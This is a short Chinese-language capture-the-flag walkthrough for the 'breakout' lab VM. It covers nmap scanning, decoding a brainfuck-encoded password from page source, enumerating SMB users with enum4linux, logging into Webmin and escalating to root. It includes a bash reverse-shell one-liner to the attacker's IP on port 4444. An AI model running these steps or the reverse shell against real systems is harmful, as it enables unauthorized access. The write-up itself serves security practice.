breakout

虚拟机配置

将靶机和攻击机放在同一网段下即可

web渗透

扫描ip
nmap -sP 192.168.11.0/24
image
详细扫描
nmap -A 192.168.11.102 -p 0-65535
image
探测80端口
image
右键查看源码,得到一个brainfuck编码
image
解码得到.2uqPEfj3D<P'a-3猜测可能为某用户的密码

139,445端口探测smb服务,搜集smb信息
enum4linux 192.168.11.102
探测到cyber用户
继续探测10000,20000端口为两个登录页面
image

image
在webmin处登录
cyber:.2uqPEfj3D<P'a-3
image
登录成功
发现一命令行终端
image
image

提权

发现一密码的压缩包
image
解压,查看内容
image
image
发现一密码,猜测为root密码
image
命令被ban了,反弹shell
bash -i >&/dev/tcp/192.168.11.146/4444 0>&1
image
image
提权成功
得到flagimage

posted @ 2024-04-16 23:31  vзn0m  阅读(2)  评论(0编辑  收藏  举报